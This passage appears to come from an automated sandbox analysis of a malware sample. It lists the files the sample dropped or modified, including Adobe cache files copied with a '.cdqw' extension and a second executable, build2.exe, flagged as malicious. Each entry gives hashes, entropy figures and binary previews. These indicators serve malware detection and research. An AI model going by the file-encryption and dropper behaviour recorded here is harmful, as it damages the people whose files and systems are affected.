                                                                                                                                                                      Preview:2023/.6.%/.x...L.....Bd..Pdu...,....!...8..a.t.2M.... e*=........h..>.$.k...1...X..d5k..a.u.j3y.\.j.....4...3...{..o.Hk....f.`re24...|".X.........)...6.^v.................0.....TBE..ir.....FM9V.~..(0q.<I.D...S.@...B.a.}..T..0....p...i....\e.{......0..8....x...F.D...u....]V.C. .M........G...H.HJ.Q......c..V'.QC.}....1.....8D......)M1W...P.;'..o..?...P.r#........4p......&.}.]....|F=.s..(....vu.....|..'].5.-..@"U..!................`.ee...?`......#~...../.I...!.O..y......+..*.. p...t.2S.py_......3.!..^.'.........Q....o..}.>...B[...M<."........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                      Entropy (8bit):7.405445581809227
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:KlDLn4uLDUseqkddhhN32x7vWC1AcizBTMeHhnFPVy1XiSUdNcii9a:uL4pnqmdhr11Xe1Xx2bD
                                                                                                                                                                      MD5:DEBD9D2D4A0B7D79CF3218FE77C0ACD8
                                                                                                                                                                      SHA1:CDE6A9A2A2B9BCF3145168CB2A7D8503B0FEB9F7
                                                                                                                                                                      SHA-256:48404EBD06BF6C016966FD59467250CCC76F29A4E5C4CAD1C81866554379F245
                                                                                                                                                                      SHA-512:ECC4E43D7E2582CD156F78D6847BFAA3F8E5149118E67EA84AAD94372AB24A389A4EC73A35115AE6D5C66235DFB9FFF6DC6F9BC1ECA99B8EF16CB96692196A5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:S.z1../yQ...;...D..G^.......E...X.5;...KTd....ETt.`.#x.x`y..g#m.$..<>B.BI2.xF2.N=Vy...^d5..FK.......~4.S.I.?..9FpG2.J.L*.H.)A"..!y....%5........_....Mpl...e.3a(`.szQ.F...v').8i}]....[..[......8...4....!.3.v...c...Y1.q.RO......6z.........Z....T2.p.c..{@i0.h`..^*.5..CZ...;....r.....&. G....bx..Z.....'J1.`i....,?|1.S.L..<V.br0^....X.e...2q...Ae`%.wmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                      Entropy (8bit):7.405445581809227
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:KlDLn4uLDUseqkddhhN32x7vWC1AcizBTMeHhnFPVy1XiSUdNcii9a:uL4pnqmdhr11Xe1Xx2bD
                                                                                                                                                                      MD5:DEBD9D2D4A0B7D79CF3218FE77C0ACD8
                                                                                                                                                                      SHA1:CDE6A9A2A2B9BCF3145168CB2A7D8503B0FEB9F7
                                                                                                                                                                      SHA-256:48404EBD06BF6C016966FD59467250CCC76F29A4E5C4CAD1C81866554379F245
                                                                                                                                                                      SHA-512:ECC4E43D7E2582CD156F78D6847BFAA3F8E5149118E67EA84AAD94372AB24A389A4EC73A35115AE6D5C66235DFB9FFF6DC6F9BC1ECA99B8EF16CB96692196A5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:S.z1../yQ...;...D..G^.......E...X.5;...KTd....ETt.`.#x.x`y..g#m.$..<>B.BI2.xF2.N=Vy...^d5..FK.......~4.S.I.?..9FpG2.J.L*.H.)A"..!y....%5........_....Mpl...e.3a(`.szQ.F...v').8i}]....[..[......8...4....!.3.v...c...Y1.q.RO......6z.........Z....T2.p.c..{@i0.h`..^*.5..CZ...;....r.....&. G....bx..Z.....'J1.`i....,?|1.S.L..<V.br0^....X.e...2q...Ae`%.wmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):617
                                                                                                                                                                      Entropy (8bit):7.559140838523433
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kBmZkRoFXCC0U++IraOIUYUQWdL+VS3e+vmofM/WsR1tFb+EHWFSUdNcii9a:seJFXB0JrL+VS35vxE/FP++2bD
                                                                                                                                                                      MD5:5D491F0F72C7BE3E7B4C7ABF75B7D6CE
                                                                                                                                                                      SHA1:6E04ECF65B4983C7F52970A9AE017137F2C9C3D8
                                                                                                                                                                      SHA-256:926AE4C8100AD1C7AAA77F17DB169890ED6315F51B1A97D3E6415BF10A11791A
                                                                                                                                                                      SHA-512:3F50A49781B95C4242A0C54CC898C59A3E94C5ED4C14794BEDC07325B03101272742A97EA9A6CE06CD3BF7FCBF564B9535F08FE011F62A4EF49BD7E1FF6A261A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/..c....[,...a..@Ov6...6.EN..V.h......m.;......9.SPty.....@..g9._.sfcn5].`O4d.z......2m..&.6".L....J.d."ep.m...=S..cL.....7E..Oj.....$./.G....-jZ.;Ah9`H.u~..P.Vz.....G.....a.b..kr.M6.}..q...k.".=..e.....Ce....;.j..`$..?."...jt.(m/.MfI.Sp..9.}..0.....\....Fa...Z..46./...5...~......j..c..y:......).;2..f3..=.j.*7.b.~O.2.gU@... ......V.....0g@;4...<...>6_.....Q.......^F.H.....YD...q*..j.s=.j+X....[;.B.G.^k...km.2...b.g..6D.[..g.Yi...g.....S.C..RcAhU....j....4+.S.t.4.......,.......rc.j....^.b.+1...:2!.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG.old.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):617
                                                                                                                                                                      Entropy (8bit):7.559140838523433
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kBmZkRoFXCC0U++IraOIUYUQWdL+VS3e+vmofM/WsR1tFb+EHWFSUdNcii9a:seJFXB0JrL+VS35vxE/FP++2bD
                                                                                                                                                                      MD5:5D491F0F72C7BE3E7B4C7ABF75B7D6CE
                                                                                                                                                                      SHA1:6E04ECF65B4983C7F52970A9AE017137F2C9C3D8
                                                                                                                                                                      SHA-256:926AE4C8100AD1C7AAA77F17DB169890ED6315F51B1A97D3E6415BF10A11791A
                                                                                                                                                                      SHA-512:3F50A49781B95C4242A0C54CC898C59A3E94C5ED4C14794BEDC07325B03101272742A97EA9A6CE06CD3BF7FCBF564B9535F08FE011F62A4EF49BD7E1FF6A261A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/..c....[,...a..@Ov6...6.EN..V.h......m.;......9.SPty.....@..g9._.sfcn5].`O4d.z......2m..&.6".L....J.d."ep.m...=S..cL.....7E..Oj.....$./.G....-jZ.;Ah9`H.u~..P.Vz.....G.....a.b..kr.M6.}..q...k.".=..e.....Ce....;.j..`$..?."...jt.(m/.MfI.Sp..9.}..0.....\....Fa...Z..46./...5...~......j..c..y:......).;2..f3..=.j.*7.b.~O.2.gU@... ......V.....0g@;4...<...>6_.....Q.......^F.H.....YD...q*..j.s=.j+X....[;.B.G.^k...km.2...b.g..6D.[..g.Yi...g.....S.C..RcAhU....j....4+.S.t.4.......,.......rc.j....^.b.+1...:2!.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):494
                                                                                                                                                                      Entropy (8bit):7.544922624860771
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:GsmQPGiWoy6Vjzcbv2wvVhgEBZsNAC4Vtkmk5SUdNcii9a:GpWVjqvrBSaC4VKmkM2bD
                                                                                                                                                                      MD5:CF915F34489C684204B48BF1F00F828D
                                                                                                                                                                      SHA1:0E9FA3DF725CABF4CD2E98184CC64BBD67A2F64C
                                                                                                                                                                      SHA-256:62C410C7D53B9E2D15991E0E3A38045115A6C352FDAF43FFA48F7AB7ED4279BC
                                                                                                                                                                      SHA-512:9224C05F909A5B25014911AEC864EDA191B4DA2D9099F6E0CE78E5CF7E267CEEF987C4C41BAAC590E1530812EB2B4F6AEAE4AA542ED6FD21AF8040CAA9C6B084
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.h.6.........w.I.sm+..)....|......f......%...k~.....8Ov..J.f... ....x2...pZi0.Lh...~.g...f..8..!b.^.:$k...kA .f!...eT3mDB..B.O...*..VH..L.{.s.......0...c&.q..U.';...PVU...:<...?y.,...C..U`L+!*..6...I$N.HRx;..f..>v#..y...0....c..{y...@.f..f....~.....\9.7~..N.~........i.%eB...l..X)..)....v.X{.&....Ds.&....H........-......1....=....hn.\Y...e.....Mj..v..CUP.....?4&...y.'V.......O..kt.S3Mz...x.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):494
                                                                                                                                                                      Entropy (8bit):7.544922624860771
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:GsmQPGiWoy6Vjzcbv2wvVhgEBZsNAC4Vtkmk5SUdNcii9a:GpWVjqvrBSaC4VKmkM2bD
                                                                                                                                                                      MD5:CF915F34489C684204B48BF1F00F828D
                                                                                                                                                                      SHA1:0E9FA3DF725CABF4CD2E98184CC64BBD67A2F64C
                                                                                                                                                                      SHA-256:62C410C7D53B9E2D15991E0E3A38045115A6C352FDAF43FFA48F7AB7ED4279BC
                                                                                                                                                                      SHA-512:9224C05F909A5B25014911AEC864EDA191B4DA2D9099F6E0CE78E5CF7E267CEEF987C4C41BAAC590E1530812EB2B4F6AEAE4AA542ED6FD21AF8040CAA9C6B084
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.h.6.........w.I.sm+..)....|......f......%...k~.....8Ov..J.f... ....x2...pZi0.Lh...~.g...f..8..!b.^.:$k...kA .f!...eT3mDB..B.O...*..VH..L.{.s.......0...c&.q..U.';...PVU...:<...?y.,...C..U`L+!*..6...I$N.HRx;..f..>v#..y...0....c..{y...@.f..f....~.....\9.7~..N.~........i.%eB...l..X)..)....v.X{.&....Ds.&....H........-......1....=....hn.\Y...e.....Mj..v..CUP.....?4&...y.'V.......O..kt.S3Mz...x.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):635
                                                                                                                                                                      Entropy (8bit):7.6229003970524865
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kEzy3ZNnATXv1LZJt3kv0DE1QkwnHJzrT52dmZwr73q6SUdNcii9a:4ifNZJAR1QkSHJzrwkG7322bD
                                                                                                                                                                      MD5:AE2F60C3A4F5341BB27C781638258113
                                                                                                                                                                      SHA1:2CCF173561732A04161FD962107652D76ACDB60B
                                                                                                                                                                      SHA-256:BD7C48A85F75209D0A7AEDC3300B380B918DCAD73729E29DA2F712228721A70A
                                                                                                                                                                      SHA-512:6E5323833B77FE2993BEF21734CF0C8EAB8533C93A4DB77D62321A89E36583D1030CA339247958E466D40C5D7E789B97B1045AC778AD4A4F2DCEBA82A53E5EBD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/.mNb)...a..n&.x.....$.D.....:...u..a].i...%.G..)...I.<Fb.C..8.qDxg....,...,._.t.{s..L.;..Z.bI.}<.._.k.Va\...i....,......E.Dyxa.\.....!.Q.d.)...#.Xd..;......j.V....3...m....Rb...u..z..]...D.....D..K.6.I.;...[...;F..L..,...7..#-\.@.(R......qy,..Z.1.......".e...&!.u....%#..G1)-..br..tJ...M<......y&....3.!=...d.p,TP.A..z#S31....K..kO.!.y../..O{.,... .....D.d.-..HO...D.\.Y. ....fL"..*".7.GLo.oK....x^Y.R.t...~..m.t.~....k+"x.Sa!` .'D...PEy."....nH....a9.).<w.n....W...?.9..@..w.xy?...Y..6#;N ......6.Tf.1.R...u'TK.Ycm..k..(.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):635
                                                                                                                                                                      Entropy (8bit):7.6229003970524865
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:kEzy3ZNnATXv1LZJt3kv0DE1QkwnHJzrT52dmZwr73q6SUdNcii9a:4ifNZJAR1QkSHJzrwkG7322bD
                                                                                                                                                                      MD5:AE2F60C3A4F5341BB27C781638258113
                                                                                                                                                                      SHA1:2CCF173561732A04161FD962107652D76ACDB60B
                                                                                                                                                                      SHA-256:BD7C48A85F75209D0A7AEDC3300B380B918DCAD73729E29DA2F712228721A70A
                                                                                                                                                                      SHA-512:6E5323833B77FE2993BEF21734CF0C8EAB8533C93A4DB77D62321A89E36583D1030CA339247958E466D40C5D7E789B97B1045AC778AD4A4F2DCEBA82A53E5EBD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/.mNb)...a..n&.x.....$.D.....:...u..a].i...%.G..)...I.<Fb.C..8.qDxg....,...,._.t.{s..L.;..Z.bI.}<.._.k.Va\...i....,......E.Dyxa.\.....!.Q.d.)...#.Xd..;......j.V....3...m....Rb...u..z..]...D.....D..K.6.I.;...[...;F..L..,...7..#-\.@.(R......qy,..Z.1.......".e...&!.u....%#..G1)-..br..tJ...M<......y&....3.!=...d.p,TP.A..z#S31....K..kO.!.y../..O{.,... .....D.d.-..HO...D.\.Y. ....fL"..*".7.GLo.oK....x^Y.R.t...~..m.t.~....k+"x.Sa!` .'D...PEy."....nH....a9.).<w.n....W...?.9..@..w.xy?...Y..6#;N ......6.Tf.1.R...u'TK.Ycm..k..(.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66791
                                                                                                                                                                      Entropy (8bit):7.995531727155867
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
                                                                                                                                                                      MD5:AC05D27423A85ADC1622C714F2CB6184
                                                                                                                                                                      SHA1:B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
                                                                                                                                                                      SHA-256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
                                                                                                                                                                      SHA-512:6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ*..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..*Q..._<.S....{a.=.n...PT.Um).| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....

                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                      Entropy (8bit):3.1247977198068786
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:kKjsosurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:YnPkPlE99SNxAhUeWcC
                                                                                                                                                                      MD5:B0FF43E573F1A99D419942B09EB52E23
                                                                                                                                                                      SHA1:3D04F8E197E1C654E8A643AFF5B54FF2425E69AE
                                                                                                                                                                      SHA-256:36B5837E4CC68A8CF43BF101B5583CB90530FD9B9895E3501C2E7BCA2EADADDA
                                                                                                                                                                      SHA-512:86782A5007997AC6CB370AF0D253562D365E1B8F4D1F14B8BD0B9B5E30F70273BE8D83F01BDA5D0760A5D7922F5909C40FF6538C0C5828CA5AFE872319BEED21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:p...... .............E..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...

                                                                                                                                                                      C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):367104
                                                                                                                                                                      Entropy (8bit):6.976668751990096
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:pfLgtyckjU51Vc7lLUvTlR2agQAYNMQSnjbeg:pfMtycGU5/klLUvTlR5Aiuv
                                                                                                                                                                      MD5:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                                      SHA1:3FB4182921FDC3ACD7873EBE113AC5522585312A
                                                                                                                                                                      SHA-256:26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                                                                                                                                                                      SHA-512:C7569CEA7F1A841E7CAC9CD41287DBA3BCACF2CF9DEE7BECE88800848A7AD5DC4CD2BDC896C7389F0F1144079BBE168048B3F722BCD76FA5D6E14F3081BB6427
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: UpS8Qm873s.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: g0Zq7nJjus.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: E0tabE4K4r.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: sbvN2ih5AU.exe, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$...:...5...:...v...:........A..'...$...x...:...%...:...%...:...%...Rich$...........................PE..L......d............................."....... ....@.................................W}......................................\U..(............................................................H......XH..@............ ..t............................text...y........................... ..`.rdata...=... ...>..................@..@.data...|....`.......P..............@....tls................................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):617
                                                                                                                                                                      Entropy (8bit):7.6599144299500015
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:k4Ja5jfrHdlVEuHthK+6kOB9oVCxUkdw8KZ7H6OvcmFOqGmFlSUdNcii9a:N4tT9lTthYLB9owfO13oqGII2bD
                                                                                                                                                                      MD5:DA8073F6A7F2D21C15BFCFEE7342CCCE
                                                                                                                                                                      SHA1:3F219944399774F9BDAD18F0F09DA0C86ED7D701
                                                                                                                                                                      SHA-256:14BD412B165D77F9A77011A3788BC09A0A8BA96C4663B7D1051BE2A9B2E05B31
                                                                                                                                                                      SHA-512:1B28AA18A48CC3FA6DD187E053A965D457CCAB8CB13433483060BB459A531B4B2292206012646821604EB33F74C7568270CA3B8D19D64DCA0F5E1F338FAD5C13
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:2023/..-.L..T.IY..O6...<.@..$.-{..........W..xg.G0...D.v...YU....P....'.....P..#|c.Qe.1.W..u...p.n...^.,.U.y O....#.7!......H ..O$y...-....... ..> .P..s_..J.+..m....e..+O...=l..?s......01.:z......1..P._.U..v..l&R.^..|b.........b._4.R.%....9........u...A.`jd.A..6.oTs....(.m.ggf...59"..4E. (\...w.;\..Kt.6.1.>..8.....w@.[.FS..wIt'..5...K3Tl......*n.".U"./...ikwM.m...67..@g.$.d]1|.`..{....[.U...V|.\..1......R.G.[.c!,t.]...4s9.....1+,........w.T.#HL..V=.h.`y..`.5K.%$...h.i..@.^.A(.+... ...Zoe...Hq8....Y....<^.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):818
                                                                                                                                                                      Entropy (8bit):7.730634998633681
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YKW/vfmO1wcoqPbNzPYEVb5lUbIJVlqa2bD:Ydfr6couYsNlUb2lqRD
                                                                                                                                                                      MD5:77047BA8D300617878E63E381F4A173F
                                                                                                                                                                      SHA1:5D5ABE5EB491B4FDA1E7FB1B06AD9FAEF176BA2C
                                                                                                                                                                      SHA-256:4F8E2B98ADAF8124064F3874E25626DCE45271BABEDE9554D66324E137D71C13
                                                                                                                                                                      SHA-512:F3817E326F3F329BBF101A1A15650E4E4654E5F972B76600B2D6DBA3199B3BA753FA90174040CB641B3A641D780E6B5DE8828C42F39D47B3CAF913A15254B60B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"os_...A.T........&b.,.&....>&p....y|.unN.. .1*..w....*%..!.=.....la.ft.hut..).U..;1Dv.1...8.PS.a.,>g........0.:.~..[.p.j.....1..j..../f8..l...*l3~0..x..P..Y8..d.+v..P[....Mwh..>. w]........BoZ.5...u..y.$_....y...X.);....Y4.z.....]...:5h1......s.R.....O."....p*.(.G.z9..Y....y...~.H.0.l.D.....*.vBBn........o..G...^..>.r%.pj....=.X[C.J&......a..<WX...x=.....c.X...%m.`&.9.........m....<...^mp.0.t.~$..)%./..<..[L....~..\.....G.N....\...G..?......=..!g........S>[x.Z+.PS.-.;[.mM...~|.r..._9.E......1....P|qK.,+.E.2..h/....Y.3....[.....p......X..m7"|<......3...$$G.....b...f.f.u...d...........y.S+.=.....o.Q..2...."/C..<c..\..._.$.ev....../....Oa...A.....+........`-fn.9.X"Y..ju...,.Z.............V.*....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1567
                                                                                                                                                                      Entropy (8bit):7.862274847292636
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:siO3NHbrNfkelnqhaIP2SHcjOKNKguoIAR63VttRD8OUKii7EDCtR0Jh2bD:dYNHb9blnqhaxS8j9N/O3jv3B7zR0J6D
                                                                                                                                                                      MD5:BF8D3C16940F858EC1BFADED12FFB6F1
                                                                                                                                                                      SHA1:F1A790830014514D352B8D8389B26B80198CA0C1
                                                                                                                                                                      SHA-256:3438C2C4B6DE2EE6731F3C5FB8D11C5947029E98554745A3537954514CFBBCBA
                                                                                                                                                                      SHA-512:9DAA6BDCA338ED221DF5235B24EDAC66FBA2236F27B169F3AEC4ACB7178C49A60F19F46C006E4EA4E8197464E1C195A11EB62A2D30A19BE662F39058B723CBA4
                                                                                                                                                                      Malicious:false
